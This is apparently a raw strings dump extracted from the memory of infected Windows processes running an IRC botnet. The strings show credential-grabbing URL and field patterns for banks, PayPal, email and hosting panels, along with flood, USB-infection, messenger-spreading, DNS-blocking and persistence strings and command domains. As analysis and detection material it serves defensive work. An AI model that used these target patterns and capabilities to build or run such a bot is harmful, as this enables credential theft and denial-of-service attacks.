*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\wbem\wmiprvse.exe
%System%\wbem\wmiprvse.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe
\Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe
c:\%original file name%.exe
c:\%original file name%.exe
spoolsv.exe_1436_rwx_00FA0000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\spoolsv.exe
%System%\spoolsv.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exe
\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exe
c:\%original file name%.exe
c:\%original file name%.exe
jqs.exe_1592_rwx_010B0000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
